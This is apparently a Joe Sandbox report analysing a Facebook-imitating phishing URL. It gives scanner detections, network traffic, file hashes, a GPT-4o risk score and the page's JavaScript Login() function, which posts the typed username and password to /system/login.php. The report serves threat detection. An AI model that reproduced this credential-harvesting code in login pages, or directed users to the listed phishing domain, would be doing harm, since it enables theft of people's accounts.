Windows Analysis Report
https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in

Overview

General Information

Sample URL:https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
Analysis ID:1448163
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 5084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1988,i,17365723044245015990,12212853972788622964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in Avira URL Cloud: detection malicious, Label: phishing
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://vww-facebook.com.vn/theme/fbweb1/fbstyle.css Avira URL Cloud: Label: phishing
Source: https://vww-facebook.com.vn/theme/fbweb1/logo.svg Avira URL Cloud: Label: phishing
Source: https://vww-facebook.com.vn/favicon.ico Avira URL Cloud: Label: phishing

Phishing

Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in Matcher: Template: facebook matched
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP Parser: Number of links: 0
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP Parser: Title: Full video call video cng ngi yu b l mi nht.Video24h.com does not match URL
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP Parser: <input type="password" .../> found
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP Parser: No favicon
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP Parser: No <meta name="author".. found
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP/1.1Host: vww-facebook.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /theme/fbweb1/fbstyle.css HTTP/1.1Host: vww-facebook.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /theme/fbweb1/logo.svg HTTP/1.1Host: vww-facebook.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /theme/fbweb1/logo.svg HTTP/1.1Host: vww-facebook.com.vnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vww-facebook.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vww-facebook.com.vnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic DNS traffic detected: DNS query: vww-facebook.com.vn
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: classification engine Classification label: mal60.phis.win@16/9@6/6
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1988,i,17365723044245015990,12212853972788622964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: Window Recorder Window detected: More than 3 window changes detected
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction |
| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in | 100% | Avira URL Cloud | phishing | |
| https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in | 100% | SlashNext | Credential Stealing type: Phishing & Social Engineering | |

No Antivirus matches
No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://vww-facebook.com.vn/theme/fbweb1/fbstyle.css | 100% | Avira URL Cloud | phishing | |
| https://vww-facebook.com.vn/theme/fbweb1/logo.svg | 100% | Avira URL Cloud | phishing | |
| https://vww-facebook.com.vn/favicon.ico | 100% | Avira URL Cloud | phishing | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| vww-facebook.com.vn | 188.114.96.3 | true | false | | unknown |
| www.google.com | 142.250.185.196 | true | false | | unknown |
| fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://vww-facebook.com.vn/theme/fbweb1/fbstyle.css | false | Avira URL Cloud: phishing | unknown |
| https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in | true | | unknown |
| https://vww-facebook.com.vn/favicon.ico | false | Avira URL Cloud: phishing | unknown |
| https://vww-facebook.com.vn/theme/fbweb1/logo.svg | false | Avira URL Cloud: phishing | unknown |

| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- | --- |
| 239.255.255.250 | unknown | Reserved | | unknown | unknown | false |
| 188.114.97.3 | unknown | European Union | | 13335 | CLOUDFLARENETUS | false |
| 142.250.185.196 | www.google.com | United States | | 15169 | GOOGLEUS | false |
| 188.114.96.3 | vww-facebook.com.vn | European Union | | 13335 | CLOUDFLARENETUS | false |

IP
192.168.2.4
192.168.2.6

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1448163
Start date and time: 2024-05-28 00:32:23 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: browseurl.jbs
Sample URL: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal60.phis.win@16/9@6/6
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 142.250.185.206, 142.250.110.84, 142.250.184.195, 34.104.35.123, 142.250.185.170, 142.250.186.106, 172.217.23.106, 142.250.186.74, 142.250.184.202, 142.250.181.234, 172.217.16.202, 172.217.18.106, 142.250.184.234, 142.250.185.202, 142.250.186.42, 142.250.186.170, 142.250.186.138, 142.250.185.234, 172.217.18.10, 172.217.16.138, 216.58.206.74, 40.68.123.157, 93.184.221.240, 192.229.221.95, 20.242.39.171, 13.95.31.18, 142.250.186.163
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtSetInformationFile calls found.
  • VT rate limit hit for: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
No simulations
Input / Output
URL: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in Model: gpt-4o
```json
{
  "riskscore": 7,
  "reasons": "The JavaScript code captures user credentials (username and password) and sends them via an AJAX POST request to a server-side script (/system/login.php). This behavior is typical of a login form, but without additional context or verification of the server-side script's legitimacy, it could potentially be used for phishing. The hardcoded 'id' parameter and redirection to a success page also raise concerns about the potential misuse of user credentials."
}
```
```javascript
function Login() {

  $('#ok').html('ang ng nhp...');
  $('#ok').attr('disabled', 'disabled');
  $.ajax({
    url: "/system/login.php",
    method: "POST",
    data: {
      id: '55345',
      tk: $("#tk").val(),
      mk: $("#mk").val(),
      type: 'Facebook'
    },
    success: function(response) {

      var data = JSON.parse(response);
      var message = data.message;
      var status = data.status;

      if (status == 'error') {
        $('#ok').removeAttr('disabled');
        $('#ok').html('ng nhp');
        $(".notilog").remove()
        document.getElementById('tk').style = 'border: 1px solid #FA3E3E;';
        document.getElementById('error').style = 'background-color: #FA3E3E; padding: 3px; color: #FFFFF3; text-align: center; font-size:15px; font-family: Arial, Helvetica, sans-serif;'
        document.getElementById('error').innerHTML = message;
      } else {

        $("#error").remove()
        window.location.href = "/success.php?id=55345";

      }

    },
    error: function(e) {
      console.log(e);
    }
  });
}
```
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65447)
          Category:downloaded
          Size (bytes):89795
          Entropy (8bit):5.290870198529059
          Encrypted:false
          SSDEEP:1536:IjjxXUHunxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBqUsuy8WnKdXwhLQvg:IeeIygP3fulzhsz8jlvaDioQ47GKH
          MD5:641DD14370106E992D352166F5A07E99
          SHA1:EDA46747C71D38A880BEE44F9A439C3858BB8F99
          SHA-256:A0FE8723DCF55DA64D06B25446D0A8513E52527C45AFCB37073465F9C6F352AF
          SHA-512:A6E981B23351186AA43F32879DD64C6801BE6E2AF7EF8B0E472CCCDEEBA52D5D7894DE4BCB292A364F1E11E525524077534338140A72687ADA4FAE62849843A5
          Malicious:false
          Reputation:low
          URL:https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text
          Category:downloaded
          Size (bytes):2918
          Entropy (8bit):4.655065340213016
          Encrypted:false
          SSDEEP:48:tMRAoJej1Arn9B7DtetoI4IAe2iFFoixzo74sQ8iDOq9eYd6srJeDvFKTXBvn7gx:sJU+v7ReeI4InRFFRxkiDV9ea6srJcvD
          MD5:55D1B2ACDBC70709CDF74480CD5F8F7A
          SHA1:E57D201E56049FDA78B7481322A2CE9B58480C99
          SHA-256:0DCFBE7C04021FDFCA0E181C4BC1D53FDEED2A05A99F630FEC43FAD5766F9AF2
          SHA-512:9A973C9FAAA40A06D3431FC5F931868C4CFD8364E234F520C93E337C2D75092BD0775B847B6B8CE5049D40718661D5D77DCE80AB6DBEBB77A42B7D26FA6573BE
          Malicious:false
          Reputation:low
          URL:https://vww-facebook.com.vn/theme/fbweb1/fbstyle.css
          Preview:...alert {. background-color: #f3071a;. color: #f3ebeb;. padding: 0;. margin: 0;. text-align: left;. position: fixed;. top: 0;. left: 0;. width: 100%;. line-height: 1.5;.}...alert span {. display: inline-block;. padding: 5px 10px;. background-color: #ff0015;.}...alert strong {. font-weight: bold;.}...overlay {. position: fixed;. top: 0;. left: 0;. width: 100%;. height: 100%;. background-color: #ffffff;. display: flex;. justify-content: center;. align-items: center;. z-index: 9999;.}...overlay-content {. display: flex;. flex-direction: column;. align-items: center;.}...logo {. text-align: center;. margin-bottom: 5px;.}...logo img {. width: 145px;.}....overlay-icon {. font-size: 40px;. margin-bottom: 20px;.}...overlay-text {. font-size: 20px;. font-weight: bold;. text-align: center;.}...container {. max-width: 400px;. margin: auto;. text-align: center;. padding: 6px;.}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:downloaded
          Size (bytes):2385
          Entropy (8bit):4.556036774993824
          Encrypted:false
          SSDEEP:48:07t6n8MnrFQiEC2o9M64cdImBl5cDiLgq4:6uraboGGI62iMB
          MD5:EBD8798BC32C86494851A07770E04E63
          SHA1:B5461DC8F5F5F848033441D506EE05D48742438B
          SHA-256:9531E96099E973B3D1C291F3E60419D8FE4730F46DE8A492FCCD2B4C962C96CE
          SHA-512:FB376AADA13675B405EBBF55C332665B5A89B7A905323D227EDFEE7729246E37A1B6B338554FFF4A0E2BB38DFBEAED59BE278BBF6F6BDFDFB4300AA6E54743E7
          Malicious:false
          Reputation:low
          URL:https://vww-facebook.com.vn/theme/fbweb1/logo.svg
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:downloaded
          Size (bytes):28
          Entropy (8bit):4.2359263506290326
          Encrypted:false
          SSDEEP:3:aoCHPUiYn:ovUL
          MD5:E0D39FE1505D2EF86332E1CF5710ACF9
          SHA1:998F55358D49542285D7745DA5BC742F4580675B
          SHA-256:9AC6F68FD65AE805BCA98F6B933C095A1E24B094B7423EF2BECFF8CEEDE0D3DA
          SHA-512:92B684CC776261575E87F5D4C8EEFFC395712EFA6916D181774EB359EBC5E1D12D3B3A8296CA3BFFCFF92E73E7900C46307EC369A5C6ECD99CFA2EDF7F733CC4
          Malicious:false
          Reputation:low
          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkIXSiJnyHX9RIFDdtsURoSBQ2-jj1P?alt=proto
          Preview:ChIKBw3bbFEaGgAKBw2+jj1PGgA=
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:dropped
          Size (bytes):2385
          Entropy (8bit):4.556036774993824
          Encrypted:false
          SSDEEP:48:07t6n8MnrFQiEC2o9M64cdImBl5cDiLgq4:6uraboGGI62iMB
          MD5:EBD8798BC32C86494851A07770E04E63
          SHA1:B5461DC8F5F5F848033441D506EE05D48742438B
          SHA-256:9531E96099E973B3D1C291F3E60419D8FE4730F46DE8A492FCCD2B4C962C96CE
          SHA-512:FB376AADA13675B405EBBF55C332665B5A89B7A905323D227EDFEE7729246E37A1B6B338554FFF4A0E2BB38DFBEAED59BE278BBF6F6BDFDFB4300AA6E54743E7
          Malicious:false
          Reputation:low
          No static file info
          Timestamp | Source IP | Dest IP | Checksum | Code | Type
          May 28, 2024 00:33:16.579485893 CEST | 192.168.2.4 | 1.1.1.1 | c232 | (Port unreachable) | Destination Unreachable
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          May 28, 2024 00:33:16.305474997 CEST | 192.168.2.4 | 1.1.1.1 | 0x5984 | Standard query (0) | vww-facebook.com.vn | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:16.305910110 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ac2 | Standard query (0) | vww-facebook.com.vn | 65 | IN (0x0001) | false
          May 28, 2024 00:33:18.142520905 CEST | 192.168.2.4 | 1.1.1.1 | 0xb66a | Standard query (0) | vww-facebook.com.vn | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:18.142838001 CEST | 192.168.2.4 | 1.1.1.1 | 0x6321 | Standard query (0) | vww-facebook.com.vn | 65 | IN (0x0001) | false
          May 28, 2024 00:33:18.666920900 CEST | 192.168.2.4 | 1.1.1.1 | 0xee8a | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:18.667064905 CEST | 192.168.2.4 | 1.1.1.1 | 0xf5a7 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          May 28, 2024 00:33:16.316883087 CEST | 1.1.1.1 | 192.168.2.4 | 0x5984 | No error (0) | vww-facebook.com.vn | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:16.316883087 CEST | 1.1.1.1 | 192.168.2.4 | 0x5984 | No error (0) | vww-facebook.com.vn | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:16.579358101 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ac2 | No error (0) | vww-facebook.com.vn | | | 65 | IN (0x0001) | false
          May 28, 2024 00:33:18.151596069 CEST | 1.1.1.1 | 192.168.2.4 | 0xb66a | No error (0) | vww-facebook.com.vn | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:18.151596069 CEST | 1.1.1.1 | 192.168.2.4 | 0xb66a | No error (0) | vww-facebook.com.vn | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:18.154023886 CEST | 1.1.1.1 | 192.168.2.4 | 0x6321 | No error (0) | vww-facebook.com.vn | | | 65 | IN (0x0001) | false
          May 28, 2024 00:33:18.675395012 CEST | 1.1.1.1 | 192.168.2.4 | 0xee8a | No error (0) | www.google.com | | 142.250.185.196 | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:18.675729036 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5a7 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
          May 28, 2024 00:33:30.476399899 CEST | 1.1.1.1 | 192.168.2.4 | 0x285e | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
          May 28, 2024 00:33:30.476399899 CEST | 1.1.1.1 | 192.168.2.4 | 0x285e | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:33:44.256795883 CEST | 1.1.1.1 | 192.168.2.4 | 0x7d6d | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
          May 28, 2024 00:33:44.256795883 CEST | 1.1.1.1 | 192.168.2.4 | 0x7d6d | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:34:07.383419037 CEST | 1.1.1.1 | 192.168.2.4 | 0x24d2 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
          May 28, 2024 00:34:07.383419037 CEST | 1.1.1.1 | 192.168.2.4 | 0x24d2 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
          May 28, 2024 00:34:28.052913904 CEST | 1.1.1.1 | 192.168.2.4 | 0x162 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
          May 28, 2024 00:34:28.052913904 CEST | 1.1.1.1 | 192.168.2.4 | 0x162 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
          • vww-facebook.com.vn
          • https:
          • fs.microsoft.com
          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | 2844 | C:\Program Files\Google\Chrome\Application\chrome.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-05-27 22:33:16 UTC | 711 | OUT | GET /d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: navigate
          Sec-Fetch-User: ?1
          Sec-Fetch-Dest: document
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-05-27 22:33:17 UTC | 824 | IN | HTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:17 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          x-powered-by: PHP/7.4.33
          set-cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb; path=/
          expires: Thu, 19 Nov 1981 08:52:00 GMT
          cache-control: no-store, no-cache, must-revalidate
          pragma: no-cache
          vary: Accept-Encoding
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQ3GJwU109JKUgfG9smBmXPUx%2BFc2ncc9mFIxXEAVGUSsoC2Kez4Vo1K42YgUIpy%2FqQpb%2FvTJ2HKzG1GlT6TneyFqL1IO8foaFvD1nqZyoOoo1OAgTnWtYZfUucmXaGYqmCwOxEp"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a97738aaba8cc3-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:17 UTC | 545 | IN | Data Ascii: 1580<!DOCTYPE html><html><head> <meta name="robots" content="index, follow"> <link rel="stylesheet" href="/theme/fbweb1/fbstyle.css"> <meta http-equiv="Content-Language" content="vi"> <meta charset="utf-8"> <meta name="viewport" con
